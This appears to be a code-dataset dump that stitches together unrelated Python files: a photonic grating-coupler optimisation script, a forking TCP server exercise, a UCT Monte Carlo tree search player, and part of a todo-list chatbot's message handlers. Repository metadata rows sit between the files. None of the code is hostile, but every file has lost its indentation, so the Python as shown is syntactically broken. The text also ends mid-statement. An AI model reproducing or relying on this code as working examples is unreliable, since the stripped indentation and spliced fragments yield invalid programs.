# Declare some constants to represent the different layers.
LAYER_SILICON_ETCHED = 100
LAYER_SILICON_NONETCHED = 101
# Create rectangles corresponding to the waveguide, the BOX layer, and the
# design region. We extend the rectangles outside the simulation region
# by multiplying locations by a factor of 1.1.
# We distinguish between the top part of the waveguide (which is etched)
# and the bottom part of the waveguide (which is not etched).
waveguide_top = gdspy.Rectangle((-1.1 * sim_size[0] / 2, -wg_width / 2),
(-grating_len / 2, wg_width / 2),
LAYER_SILICON_ETCHED)
waveguide_bottom = gdspy.Rectangle((-1.1 * sim_size[0] / 2, -wg_width / 2),
(grating_len / 2, wg_width / 2),
LAYER_SILICON_NONETCHED)
design_region = gdspy.Rectangle((-grating_len / 2, -wg_width / 2),
(grating_len / 2, wg_width / 2),
LAYER_SILICON_ETCHED)
# Generate the foreground and background GDS files.
gds_fg = gdspy.Cell("FOREGROUND", exclude_from_current=True)
gds_fg.add(waveguide_top)
gds_fg.add(waveguide_bottom)
gds_fg.add(design_region)
gds_bg = gdspy.Cell("BACKGROUND", exclude_from_current=True)
gds_bg.add(waveguide_top)
gds_bg.add(waveguide_bottom)
gdspy.write_gds(gds_fg_name, [gds_fg], unit=1e-9, precision=1e-9)
gdspy.write_gds(gds_bg_name, [gds_bg], unit=1e-9, precision=1e-9)
if visualize:
gdspy.LayoutViewer(cells=[gds_fg])
gdspy.LayoutViewer(cells=[gds_bg])
# The BOX layer/silicon device interface is set at `z = 0`.
#
# Describe materials in each layer.
# We actually have four material layers:
# 1) Silicon substrate
# 2) Silicon oxide BOX layer
# 3) Bottom part of grating that is not etched
# 4) Top part of grating that can be etched.
#
# The last two layers put together properly describe a partial etch.
#
# Note that the layer numbering in the GDS file is arbitrary. In our case,
# layer 100 and 101 correspond to actual structure. Layer 300 is a dummy
# layer; it is used for layers that only have one material (i.e. the
# background and foreground indices are identical) so the actual structure
# used does not matter.
stack = [
optplan.GdsMaterialStackLayer(
foreground=optplan.Material(mat_name="Si"),
background=optplan.Material(mat_name="Si"),
# Note that layer number here does not actually matter because
# the foreground and background are the same material.
gds_layer=[300, 0],
extents=[-10000, -box_thickness],
),
optplan.GdsMaterialStackLayer(
foreground=optplan.Material(mat_name="SiO2"),
background=optplan.Material(mat_name="SiO2"),
gds_layer=[300, 0],
extents=[-box_thickness, 0],
),
]
# If `etch-frac` is 1, then we do not need two separate layers.
if etch_frac != 1:
stack.append(
optplan.GdsMaterialStackLayer(
foreground=optplan.Material(mat_name="Si"),
background=optplan.Material(mat_name="SiO2"),
gds_layer=[LAYER_SILICON_NONETCHED, 0],
extents=[0, wg_thickness * (1 - etch_frac)],
))
stack.append(
optplan.GdsMaterialStackLayer(
foreground=optplan.Material(mat_name="Si"),
background=optplan.Material(mat_name="SiO2"),
gds_layer=[LAYER_SILICON_ETCHED, 0],
extents=[wg_thickness * (1 - etch_frac), wg_thickness],
))
mat_stack = optplan.GdsMaterialStack(
# Any region of the simulation that is not specified is filled with
# oxide.
background=optplan.Material(mat_name="SiO2"),
stack=stack,
)
sim_z_start = -box_thickness - 1000
sim_z_end = wg_thickness + 1500
# Create a simulation space for both continuous and discrete optimization.
simspace = optplan.SimulationSpace(
name="simspace",
mesh=optplan.UniformMesh(dx=dx),
eps_fg=optplan.GdsEps(gds=gds_fg_name, mat_stack=mat_stack),
eps_bg=optplan.GdsEps(gds=gds_bg_name, mat_stack=mat_stack),
# Note that we explicitly set the simulation region. Anything
# in the GDS file outside of the simulation extents will not be drawn.
sim_region=optplan.Box3d(
center=[0, 0, (sim_z_start + sim_z_end) / 2],
extents=[sim_size[0], dx, sim_z_end - sim_z_start],
),
selection_matrix_type="uniform",
# PMLs are applied on x- and z-axes. No PMLs are applied along y-axis
# because it is the axis of translational symmetry.
pml_thickness=[num_pmls, num_pmls, 0, 0, num_pmls, num_pmls],
)
if visualize:
# To visualize permittivity distribution, we actually have to
# construct the simulation space object.
import matplotlib.pyplot as plt
from spins.invdes.problem_graph.simspace import get_fg_and_bg
context = workspace.Workspace()
eps_fg, eps_bg = get_fg_and_bg(context.get_object(simspace), wlen=1550)
def plot(x):
plt.imshow(np.abs(x)[:, 0, :].T.squeeze(), origin="lower")
plt.figure()
plt.subplot(3, 1, 1)
plot(eps_fg[2])
plt.title("eps_fg")
plt.subplot(3, 1, 2)
plot(eps_bg[2])
plt.title("eps_bg")
plt.subplot(3, 1, 3)
plot(eps_fg[2] - eps_bg[2])
plt.title("design region")
plt.show()
return simspace
def create_objective(
sim_space: optplan.SimulationSpace,
wg_thickness: float,
grating_len: float,
) -> Tuple[optplan.Function, List[optplan.Monitor]]:
"""Creates an objective function.
The objective function is what is minimized during the optimization.
Args:
sim_space: The simulation space description.
wg_thickness: Thickness of waveguide.
grating_len: Length of grating.
Returns:
A tuple `(obj, monitor_list)` where `obj` is an objectivce function that
tries to maximize the coupling efficiency of the grating coupler and
`monitor_list` is a list of monitors (values to keep track of during
the optimization.
"""
# Keep track of metrics and fields that we want to monitor.
monitor_list = []
objectives = []
# Set wavelengths to optimize over
wlens = [1550]
for wlen in wlens:
epsilon = optplan.Epsilon(
simulation_space=sim_space,
wavelength=wlen,
)
# Append to monitor list for each wavelength
monitor_list.append(
optplan.FieldMonitor(name="mon_eps_" + str(wlen), function=epsilon))
# Add a Gaussian source that is angled at 10 degrees.
sim = optplan.FdfdSimulation(
source=optplan.GaussianSource(
polarization_angle=0,
theta=np.deg2rad(-10),
psi=np.pi / 2,
center=[0, 0, wg_thickness + 700],
extents=[14000, 14000, 0],
normal=[0, 0, -1],
power=1,
w0=5200,
normalize_by_sim=True,
),
solver="local_direct",
wavelength=wlen,
simulation_space=sim_space,
epsilon=epsilon,
)
monitor_list.append(
optplan.FieldMonitor(
name="mon_field_" + str(wlen),
function=sim,
normal=[0, 1, 0],
center=[0, 0, 0],
))
wg_overlap = optplan.WaveguideModeOverlap(
center=[-grating_len / 2 - 1000, 0, wg_thickness / 2],
extents=[0.0, 1500, 1500.0],
mode_num=0,
normal=[-1.0, 0.0, 0.0],
power=1.0,
)
power = optplan.abs(
optplan.Overlap(simulation=sim, overlap=wg_overlap))**2
monitor_list.append(
optplan.SimpleMonitor(
name="mon_power_" + str(wlen), function=power))
if not MINIMIZE_BACKREFLECTION:
# Spins minimizes the objective function, so to make `power` maximized,
# we minimize `1 - power`.
obj = 1 - power
else:
# TODO: Use a Gaussian overlap to calculate power emitted by grating
# so we only need one simulation to handle backreflection and
# transmission.
refl_sim = optplan.FdfdSimulation(
source=optplan.WaveguideModeSource(
center=wg_overlap.center,
extents=wg_overlap.extents,
mode_num=0,
normal=[1, 0, 0],
power=1.0,
),
solver="local_direct",
wavelength=wlen,
simulation_space=sim_space,
epsilon=epsilon,
)
refl_power = optplan.abs(
optplan.Overlap(simulation=refl_sim, overlap=wg_overlap))**2
monitor_list.append(
optplan.SimpleMonitor(
name="mon_refl_power_" + str(wlen), function=refl_power))
# We now have two sub-objectives: Maximize transmission and minimize
# back-reflection, so we must an objective that defines the appropriate
# tradeoff between transmission and back-reflection. Here, we choose the
# simplest objective to do this, but you can use SPINS functions to
# design more elaborate objectives.
obj = (1 - power) + 4 * refl_power
objectives.append(obj)
obj = sum(objectives)
return obj, monitor_list
def create_transformations(
obj: optplan.Function,
monitors: List[optplan.Monitor],
cont_iters: int,
disc_iters: int,
sim_space: optplan.SimulationSpaceBase,
min_feature: float = 100,
cont_to_disc_factor: float = 1.1,
) -> List[optplan.Transformation]:
"""Creates a list of transformations for the optimization.
The grating coupler optimization proceeds as follows:
1) Continuous optimization whereby each pixel can vary between device and
background permittivity.
2) Discretization whereby the continuous pixel parametrization is
transformed into a discrete grating (Note that L2D is implemented here).
3) Further optimization of the discrete grating by moving the grating
edges.
Args:
opt: The objective function to minimize.
monitors: List of monitors to keep track of.
cont_iters: Number of iterations to run in continuous optimization.
disc_iters: Number of iterations to run in discrete optimization.
sim_space: Simulation space ot use.
min_feature: Minimum feature size in nanometers.
cont_to_disc_factor: Discretize the continuous grating with feature size
constraint of `min_feature * cont_to_disc_factor`.
`cont_to_disc_factor > 1` gives discrete optimization more wiggle
room.
Returns:
A list of transformations.
"""
# Setup empty transformation list.
trans_list = []
# First do continuous relaxation optimization.
cont_param = optplan.PixelParametrization(
simulation_space=sim_space,
init_method=optplan.UniformInitializer(min_val=0, max_val=1))
trans_list.append(
optplan.Transformation(
name="opt_cont",
parametrization=cont_param,
transformation=optplan.ScipyOptimizerTransformation(
optimizer="L-BFGS-B",
objective=obj,
monitor_lists=optplan.ScipyOptimizerMonitorList(
callback_monitors=monitors,
start_monitors=monitors,
end_monitors=monitors),
optimization_options=optplan.ScipyOptimizerOptions(
maxiter=cont_iters),
),
))
# If true, do another round of continous optimization with a discreteness bias.
if DISCRETENESS_PENALTY:
# Define parameters necessary to normaize discrete penalty term
obj_val_param = optplan.Parameter(
name="param_obj_final_val", initial_value=1.0)
obj_val_param_abs = optplan.abs(obj_val_param)
discrete_penalty_val = optplan.Parameter(
name="param_discrete_penalty_val", initial_value=1.0)
discrete_penalty_val_abs = optplan.abs(discrete_penalty_val)
# Initial value of scaling is arbitrary and set for specific problem
disc_scaling = optplan.Parameter(
name="discrete_scaling", initial_value=5)
normalization = disc_scaling * obj_val_param_abs / discrete_penalty_val_abs
obj_disc = obj + optplan.DiscretePenalty() * normalization
trans_list.append(
optplan.Transformation(
name="opt_cont_disc",
parameter_list=[
optplan.SetParam(
parameter=obj_val_param,
function=obj,
parametrization=cont_param),
optplan.SetParam(
parameter=discrete_penalty_val,
function=optplan.DiscretePenalty(),
parametrization=cont_param)
],
parametrization=cont_param,
transformation=optplan.ScipyOptimizerTransformation(
optimizer="L-BFGS-B",
objective=obj_disc,
monitor_lists=optplan.ScipyOptimizerMonitorList(
callback_monitors=monitors,
start_monitors=monitors,
end_monitors=monitors),
optimization_options=optplan.ScipyOptimizerOptions(
maxiter=cont_iters),
)))
# Discretize. Note we add a little bit of wiggle room by discretizing with
# a slightly larger feature size that what our target is (by factor of
# `cont_to_disc_factor`). This is to give the optimization a bit more wiggle
# room later on.
disc_param = optplan.GratingParametrization(
simulation_space=sim_space, inverted=True)
trans_list.append(
optplan.Transformation(
name="cont_to_disc",
parametrization=disc_param,
transformation=optplan.GratingEdgeFitTransformation(
parametrization=cont_param,
min_feature=cont_to_disc_factor * min_feature)))
# Discrete optimization.
trans_list.append(
optplan.Transformation(
name="opt_disc",
parametrization=disc_param,
transformation=optplan.ScipyOptimizerTransformation(
optimizer="SLSQP",
objective=obj,
constraints_ineq=[
optplan.GratingFeatureConstraint(
min_feature_size=min_feature,
simulation_space=sim_space,
boundary_constraint_scale=1.0,
)
],
monitor_lists=optplan.ScipyOptimizerMonitorList(
callback_monitors=monitors,
start_monitors=monitors,
end_monitors=monitors),
optimization_options=optplan.ScipyOptimizerOptions(
maxiter=disc_iters),
),
))
return trans_list
def view_opt(save_folder: str) -> None:
"""Shows the result of the optimization.
This runs the auto-plotter to plot all the relevant data.
See `examples/wdm2` IPython notebook for more details on how to process
the optimization logs.
Args:
save_folder: Location where the log files are saved.
"""
log_df = log_tools.create_log_data_frame(
log_tools.load_all_logs(save_folder))
monitor_descriptions = log_tools.load_from_yml(
os.path.join(os.path.dirname(__file__), "monitor_spec.yml"))
log_tools.plot_monitor_data(log_df, monitor_descriptions)
def view_opt_quick(save_folder: str) -> None:
"""Prints the current result of the optimization.
Unlike `view_opt`, which plots fields and optimization trajectories,
`view_opt_quick` prints out scalar monitors in the latest log file. This
is useful for having a quick look into the state of the optimization.
Args:
save_folder: Location where the log files are saved.
"""
with open(workspace.get_latest_log_file(save_folder), "rb") as fp:
log_data = pickle.load(fp)
for key, data in log_data["monitor_data"].items():
if np.isscalar(data):
print("{}: {}".format(key, data.squeeze()))
def resume_opt(save_folder: str) -> None:
"""Resumes a stopped optimization.
This restarts an optimization that was stopped prematurely. Note that
resuming an optimization will not lead the exact same results as if the
optimization were finished the first time around.
Args:
save_folder: Location where log files are saved. It is assumed that
the optimization plan is also saved there.
"""
# Load the optimization plan.
with open(os.path.join(save_folder, "optplan.json")) as fp:
plan = optplan.loads(fp.read())
# Run the plan with the `resume` flag to restart.
problem_graph.run_plan(plan, ".", save_folder=save_folder, resume=True)
def gen_gds(save_folder: str, grating_len: float, wg_width: float) -> None:
"""Generates a GDS file of the grating.
Args:
save_folder: Location where log files are saved. It is assumed that
the optimization plan is also saved there.
grating_len: Length of the grating.
wg_width: Width of the grating/bus waveguide.
"""
# Load the optimization plan.
with open(os.path.join(save_folder, "optplan.json")) as fp:
plan = optplan.loads(fp.read())
dx = plan.transformations[-1].parametrization.simulation_space.mesh.dx
# Load the data from the latest log file.
with open(workspace.get_latest_log_file(save_folder), "rb") as fp:
log_data = pickle.load(fp)
if log_data["transformation"] != plan.transformations[-1].name:
raise ValueError("Optimization did not run until completion.")
coords = log_data["parametrization"]["vector"] * dx
if plan.transformations[-1].parametrization.inverted:
coords = np.insert(coords, 0, 0, axis=0)
coords = np.insert(coords, -1, grating_len, axis=0)
# `coords` now contains the location of the grating edges. Now draw a
# series of rectangles to represent the grating.
grating_poly = []
for i in range(0, len(coords), 2):
grating_poly.append(
((coords[i], -wg_width / 2), (coords[i], wg_width / 2),
(coords[i + 1], wg_width / 2), (coords[i + 1], -wg_width / 2)))
# Save the grating to `grating.gds`.
grating = gdspy.Cell("GRATING", exclude_from_current=True)
grating.add(gdspy.PolygonSet(grating_poly, 100))
gdspy.write_gds(
os.path.join(save_folder, "grating.gds"), [grating],
unit=1.0e-9,
precision=1.0e-9)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"action",
choices=("run", "view", "view_quick", "resume", "gen_gds"),
help="Must be either \"run\" to run an optimization, \"view\" to "
"view the results, \"resume\" to resume an optimization, or "
"\"gen_gds\" to generate the grating GDS file.")
parser.add_argument(
"save_folder", help="Folder containing optimization logs.")
grating_len = 12000
wg_width = 12000
args = parser.parse_args()
if args.action == "run":
run_opt(args.save_folder, grating_len=grating_len, wg_width=wg_width)
elif args.action == "view":
view_opt(args.save_folder)
elif args.action == "view_quick":
view_opt_quick(args.save_folder)
elif args.action == "resume":
resume_opt(args.save_folder)
elif args.action == "gen_gds":
gen_gds(args.save_folder, grating_len=grating_len, wg_width=wg_width)
| gpl-3.0 | 1,575,267,830,922,040,600 | 37.517557 | 84 | 0.614214 | false | 3.83012 | false | false | false |
nathanIL/books | Foundations_of_Python_Network_Programming/Chapter02/tcp_servers.py | 1 | 3607 | """
Forking TCP Servers stuff based on book material (but not 1:1)
"""
import socket
import argparse
import time
import os
from multiprocessing import Process
from functools import partial
def args_handle(handlers, string):
if string in handlers.keys():
return handlers.get(string)
else:
raise argparse.ArgumentTypeError("Invalid server type provided")
def parse_arguments():
"""
Parse command line arguments
:return: argparse.Namespace object holding the arguments
"""
HANDLERS = {h: o for h, o in globals().items() if h.startswith('handle_')}
parser = argparse.ArgumentParser()
parser.add_argument('--port', help='The port on which the server will listen', type=int, default=51150)
parser.add_argument('--mproc', help='The maximum allowed clients / processes at a given time', type=int, default=10)
parser.add_argument('--type', help='The server type: ' + ', '.join(HANDLERS.keys()), default='handle_fixed_request',
type=partial(args_handle, HANDLERS))
return parser.parse_args()
def handle_fixed_request(connection, address, size=512):
"""
Fixed size request handler
:param connection: the socket / connection object received
:param address: the remote address
:param size: The maximum size of each request
"""
start = time.time()
total_data = ''
try:
while len(total_data) < size:
data = connection.recv(size - len(total_data))
if not data:
break
print("[SERVER | PID {0}]: {1}".format(os.getpid(), data.rstrip()))
total_data += data
except Exception as e:
print("Error ", e.message)
finally:
connection.close()
end = time.time() - start
print("[SERVER]: {0} closed connection after {1:.2f} seconds".format(address, end))
def handle_http_request(connection, address):
"""
Deadly naive and simple HTTP handler.
:param connection: The socket
:param address: The remote-end address
"""
REQUIRED_HEADERS = ['Content-Length']
SUPPORTED_METHODS = ['GET', 'POST']
HTTP_VERSIONS = ['HTTP/1.1']
headers = dict()
headers_raw = ''
body = ''
while True:
h = connection.recv(1024)
if not h:
break
elif '\r\n' in h:
crlf_idx = h.rfind('\r\n')
headers_raw += h[:crlf_idx]
body = h[crlf_idx:]
break
headers_raw += h
# Parse Headers
request_line = headers_raw.split('\n')[0].split()
# TODO: Validate the resource element
if len(request_line) != 3 or request_line[0] not in SUPPORTED_METHODS or request_line[2] not in HTTP_VERSIONS:
print("[ERROR]: Invalid HTTP request line: " + ' '.join(request_line))
return
headers = {e.split(':')[0].strip():e.split(':')[1].strip() for e in headers_raw.splitlines()[1:]}
print(headers)
# Get body
def server(port, mproc, server_type):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.listen(mproc)
print("[SERVER]: Listening on {0}".format(s.getsockname()))
while True:
(connection, address) = s.accept()
print("[SERVER]: Connection established with {0}".format(address))
process = Process(target=server_type, args=(connection, address))
process.daemon = True
process.start()
if __name__ == "__main__":
args = parse_arguments()
server(port=args.port, mproc=args.mproc, server_type=args.type)
| apache-2.0 | 830,403,105,968,279,600 | 31.495495 | 120 | 0.61852 | false | 3.874329 | false | false | false |
jbradberry/mcts | mcts/uct.py | 1 | 6593 | from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import time
from math import log, sqrt
from random import choice
from six.moves import range
class Stat(object):
__slots__ = ('value', 'visits')
def __init__(self, value=0.0, visits=0):
self.value = value
self.visits = visits
def __repr__(self):
return u"Stat(value={}, visits={})".format(self.value, self.visits)
class UCT(object):
def __init__(self, board, **kwargs):
self.board = board
self.history = []
self.stats = {}
self.max_depth = 0
self.data = {}
self.calculation_time = float(kwargs.get('time', 30))
self.max_actions = int(kwargs.get('max_actions', 1000))
# Exploration constant, increase for more exploratory actions,
# decrease to prefer actions with known higher win rates.
self.C = float(kwargs.get('C', 1.4))
def update(self, state):
self.history.append(self.board.to_compact_state(state))
def display(self, state, action):
return self.board.display(state, action)
def winner_message(self, winners):
return self.board.winner_message(winners)
def get_action(self):
# Causes the AI to calculate the best action from the
# current game state and return it.
self.max_depth = 0
self.data = {'C': self.C, 'max_actions': self.max_actions, 'name': self.name}
self.stats.clear()
state = self.history[-1]
player = self.board.current_player(state)
legal = self.board.legal_actions(state)
# Bail out early if there is no real choice to be made.
if not legal:
return {'type': 'action', 'message': None, 'extras': self.data.copy()}
if len(legal) == 1:
return {
'type': 'action',
'message': self.board.to_json_action(legal[0]),
'extras': self.data.copy(),
}
games = 0
begin = time.time()
while time.time() - begin < self.calculation_time:
self.run_simulation()
games += 1
# Display the number of calls of `run_simulation` and the
# time elapsed.
self.data.update(games=games, max_depth=self.max_depth,
time=str(time.time() - begin))
print(self.data['games'], self.data['time'])
print("Maximum depth searched:", self.max_depth)
# Store and display the stats for each possible action.
self.data['actions'] = self.calculate_action_values(self.history, player, legal)
for m in self.data['actions']:
print(self.action_template.format(**m))
# Return the action with the highest average value.
return {
'type': 'action',
'message': self.board.to_json_action(self.data['actions'][0]['action']),
'extras': self.data.copy(),
}
def run_simulation(self):
# Plays out a "random" game from the current position,
# then updates the statistics tables with the result.
# A bit of an optimization here, so we have a local
# variable lookup instead of an attribute access each loop.
C, stats = self.C, self.stats
visited_states = []
history_copy = self.history[:]
state = history_copy[-1]
expand = True
for t in range(1, self.max_actions + 1):
legal = self.board.legal_actions(state)
actions_states = [(a, self.board.next_state(history_copy, a)) for a in legal]
if expand and not all(S in stats for a, S in actions_states):
stats.update((S, Stat()) for a, S in actions_states if S not in stats)
expand = False
if t > self.max_depth:
self.max_depth = t
if expand:
# If we have stats on all of the legal actions here, use UCB1.
actions_states = [(a, S, stats[S]) for a, S in actions_states]
log_total = log(sum(e.visits for a, S, e in actions_states) or 1)
values_actions = [
(a, S, (e.value / (e.visits or 1)) + C * sqrt(log_total / (e.visits or 1)))
for a, S, e in actions_states
]
max_value = max(v for _, _, v in values_actions)
# Filter down to only those actions with maximum value under UCB1.
actions_states = [(a, S) for a, S, v in values_actions if v == max_value]
action, state = choice(actions_states)
visited_states.append(state)
history_copy.append(state)
if self.board.is_ended(state):
break
# Back-propagation
end_values = self.end_values(state)
for state in visited_states:
if state not in stats:
continue
S = stats[state]
S.visits += 1
S.value += end_values[self.board.previous_player(state)]
class UCTWins(UCT):
name = "jrb.mcts.uct"
action_template = "{action}: {percent:.2f}% ({wins} / {plays})"
def __init__(self, board, **kwargs):
super(UCTWins, self).__init__(board, **kwargs)
self.end_values = board.win_values
def calculate_action_values(self, history, player, legal):
actions_states = ((a, self.board.next_state(history, a)) for a in legal)
return sorted(
({'action': a,
'percent': 100 * self.stats[S].value / (self.stats[S].visits or 1),
'wins': self.stats[S].value,
'plays': self.stats[S].visits}
for a, S in actions_states),
key=lambda x: (x['percent'], x['plays']),
reverse=True
)
class UCTValues(UCT):
name = "jrb.mcts.uctv"
action_template = "{action}: {average:.1f} ({sum} / {plays})"
def __init__(self, board, **kwargs):
super(UCTValues, self).__init__(board, **kwargs)
self.end_values = board.points_values
def calculate_action_values(self, history, player, legal):
actions_states = ((a, self.board.next_state(history, a)) for a in legal)
return sorted(
({'action': a,
'average': self.stats[S].value / (self.stats[S].visits or 1),
'sum': self.stats[S].value,
'plays': self.stats[S].visits}
for a, S in actions_states),
key=lambda x: (x['average'], x['plays']),
reverse=True
)
| mit | 3,440,120,661,568,870,400 | 34.637838 | 95 | 0.556348 | false | 3.819815 | false | false | false |
botstory/todo-bot | todo/stories.py | 1 | 18715 | from botstory.ast import story_context
from botstory.middlewares import any, option, sticker, text
from bson.objectid import ObjectId
import datetime
import emoji
import logging
import os
import random
import re
from todo import orm, pagination_list, reflection
from todo.lists import lists_document
from todo.tasks import \
task_creation_stories, \
task_details_renderer, \
task_state_stories, \
task_story_helper, \
tasks_document
logger = logging.getLogger(__name__)
logger.debug('parse stories')
SHORT_HELP = 'Short Help:\n' \
'===========\n' \
'\n' \
':white_check_mark: Please give me few names of tasks (command: add new task)\n' \
':white_check_mark: In any time when you work with your task you can change its status ' \
'from open :arrow_right: in progress :arrow_right: done ' \
'(commands: start, stop, done, reopen)\n' \
':white_check_mark: list all your tasks (command: list)\n' \
':white_check_mark: details about task (command: last details)\n' \
':white_check_mark: work with last task (command: start last, stop last, done last, ' \
'reopen last, last task, remove last)\n' \
':white_check_mark: change all tasks at once (commands: start all, stop all, ' \
'done all, reopen all, remove all)\n' \
'\n' \
'All my source could be found here:\n' \
'https://github.com/botstory/todo-bot/, feedback and PRs are welcomed!'
SHORT_HELP_EMOJI = emoji.emojize(SHORT_HELP, use_aliases=True)
def setup(story):
pagination_list.setup(story)
task_state_stories.setup(story)
@story.on_start()
def on_start_story():
"""
User just pressed `get started` button so we can greet him
"""
@story.part()
async def greetings(message):
logger.info('greetings')
await story.say('Nice to see you here!\n'
'My goal is to help you with your list of tasks.',
user=message['user'])
await story.say(SHORT_HELP_EMOJI,
user=message['user'])
await story.ask('let\'s begin!',
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}],
user=message['user'])
@story.on(text.text.EqualCaseIgnore('all'))
def list_of_lists_story():
@story.part()
async def show_list_of_stories(ctx):
logger.info('list of tasks')
# TODO: remove return solve one test, but why?
return await pagination_list.pagination_loop(
list_title='All lists:',
target_document=reflection.class_to_str(lists_document.ListDocument),
title_field='name',
page_length=os.environ.get('LIST_PAGE_LENGTH', 4),
**ctx,
)
@story.on([
option.Equal('LIST_TASKS_NEW_FIRST'),
text.Match('^list(( all)? tasks)?', flags=re.IGNORECASE),
text.EqualCaseIgnore('todo'),
])
def list_of_tasks_story():
@story.part()
async def list_of_tasks(ctx):
logger.info('list of tasks')
# TODO: should filter the last one
return await pagination_list.pagination_loop(
ctx,
subtitle_renderer=reflection.class_to_str(tasks_document.task_details_renderer),
list_title='List of actual tasks:',
list_type='template',
page_length=os.environ.get('LIST_PAGE_LENGTH', 4),
target_document=reflection.class_to_str(tasks_document.TaskDocument),
title_field='description',
)
@story.on(text.text.EqualCaseIgnore('new list'))
def new_list_tasks_story():
@story.part()
async def ask_name(message):
logger.info('new list')
return await story.ask(
'You are about to create new list of tasks.\nWhat is the name of it?',
user=message['user'],
)
@story.part()
async def create_list(ctx):
logger.info('create list')
list_name = text.get_raw_text(ctx)
new_list = await lists_document.ListDocument(**{
'user_id': ctx['user']['_id'],
'name': list_name,
'created_at': datetime.datetime.now(),
'updated_at': datetime.datetime.now(),
}).save()
await story.say('You\'ve just created list of tasks: '
'`{}`.\n'
'Now you can add tasks to it.'.format(list_name), user=ctx['user'])
@story.on([
option.Equal('REMOVE_LAST_TASK'),
text.Match('delete last', flags=re.IGNORECASE),
text.Match('drop last', flags=re.IGNORECASE),
text.Match('forget about last', flags=re.IGNORECASE),
text.Match('kill last', flags=re.IGNORECASE),
text.Match('remove (last|next)', flags=re.IGNORECASE),
])
def remove_last_task_story():
@story.part()
async def remove_last_task(ctx):
logger.info('remove last task')
try:
last_task = await task_story_helper.last_task(ctx)
desc = last_task.description
logger.debug('going to remove task `{}`'.format(desc))
await tasks_document.TaskDocument.objects({
'_id': last_task._id,
}).delete_one()
msg = emoji.emojize(':ok: task `{}` was removed'.format(desc), use_aliases=True)
logger.info(msg)
await story.ask(msg,
quick_replies=[{
'title': 'remove next',
'payload': 'REMOVE_LAST_TASK',
}, {
'title': 'next details',
'payload': 'LAST_TASK_DETAILS',
}, {
'title': 'add task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
user=ctx['user'])
except orm.errors.DoesNotExist:
logger.warning('user doesnt have tickets to remove')
await story.ask(emoji.emojize(
'You don\'t have any tickets yet.\n'
':information_source: Please send my few words about it and I will add it to your TODO list.',
use_aliases=True,
),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}],
user=ctx['user'],
)
@story.on(option.Match('REMOVE_TASK_(.+)'))
def remove_task_story():
@story.part()
async def try_to_remove_task(ctx):
task_id = story_context.get_message_data(ctx, 'option', 'matches')[0]
try:
task = await tasks_document.TaskDocument.objects.find_one({
'_id': ObjectId(task_id),
})
await tasks_document.TaskDocument.objects({
'_id': task._id,
}).delete_one()
await story.ask(emoji.emojize(':ok: Task `{}` was deleted', use_aliases=True).format(task.description),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
user=ctx['user'])
except orm.errors.DoesNotExist:
await story.ask(emoji.emojize(':confused: Can\'t find task.\n'
'It seems that it was already removed.', use_aliases=True),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
user=ctx['user'])
@story.on([
option.Equal('REMOVE_ALL_TASKS'),
text.Match('delete all(?: tasks)?(?: jobs)?', flags=re.IGNORECASE),
text.Match('drop all(?: tasks)?', flags=re.IGNORECASE),
text.Match('forget all(?: tasks)?', flags=re.IGNORECASE),
text.Match('kill all(?: tasks)?', flags=re.IGNORECASE),
text.Match('remove all(?: tasks)?', flags=re.IGNORECASE),
])
def remove_all_tasks_story():
@story.part()
async def ask_whether_user_really_want_to_remove_all_tasks(ctx):
logger.info('ask whether remove all tasks or not')
return await story.ask(emoji.emojize(
':question: Do you really want to remove all your tasks '
'of current list?',
use_aliases=True,
), quick_replies=[{
'title': 'Sure, remove all!',
'payload': 'CONFIRM_REMOVE_ALL'
}, {
'title': 'Nope',
'payload': 'REFUSE_REMOVE_ALL'
}], user=ctx['user'])
@story.case([
option.Equal('CONFIRM_REMOVE_ALL'),
sticker.Like(),
text.Match('confirm', flags=re.IGNORECASE),
text.Match('ok', flags=re.IGNORECASE),
text.Match('(.*)remove(.*)', flags=re.IGNORECASE),
text.Match('sure(.*)', flags=re.IGNORECASE),
text.Match('yeah', flags=re.IGNORECASE),
text.Match('yes', flags=re.IGNORECASE),
])
def confirm_to_remove_all():
@story.part()
async def remove_all_tasks(ctx):
logger.info('remove all tasks')
tasks_count = await tasks_document.TaskDocument.objects({
'user_id': ctx['user']['_id'],
}).delete()
msg = emoji.emojize(':ok: {} tasks were removed'.format(tasks_count), use_aliases=True)
logger.info(msg)
await story.ask(msg,
quick_replies=[{
'title': 'remove next',
'payload': 'REMOVE_LAST_TASK',
}, {
'title': 'next details',
'payload': 'LAST_TASK_DETAILS',
}, {
'title': 'add task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list',
'payload': 'LIST_TASKS_NEW_FIRST',
},
],
user=ctx['user'])
@story.on([
text.Match('delete (.*)', flags=re.IGNORECASE),
text.Match('drop (.*)', flags=re.IGNORECASE),
text.Match('forget about (.*)', flags=re.IGNORECASE),
text.Match('kill (.*)', flags=re.IGNORECASE),
text.Match('remove (.*)', flags=re.IGNORECASE),
])
def remove_something_story():
"""
got request to remove something (list or task)
"""
@story.part()
async def remove_list_or_task(ctx):
logger.info('remove list or task')
target = story_context.get_message_data(ctx)['text']['matches'][0]
logger.info('target {}'.format(target))
logger.debug('try to remove task {}'.format(target))
count = await tasks_document.TaskDocument.objects({
'description': target,
'user_id': ctx['user']['_id'],
}).delete()
logger.info('remove {} lists'.format(count))
if count > 0:
await story.say(emoji.emojize(':ok: Task `{}` was removed'.format(target), use_aliases=True),
user=ctx['user'])
return
logger.debug('try to remove list {}'.format(target))
count = await lists_document.ListDocument.objects({
'name': target,
'user_id': ctx['user']['_id'],
}).delete()
logger.info('remove {} lists'.format(count))
if count > 0:
await story.say(emoji.emojize(':ok: List `{}` was removed'.format(target), use_aliases=True),
user=ctx['user'])
return
await story.say(emoji.emojize(':confused: We can\'t find `{}` what do you want to remove?'.format(target),
use_aliases=True),
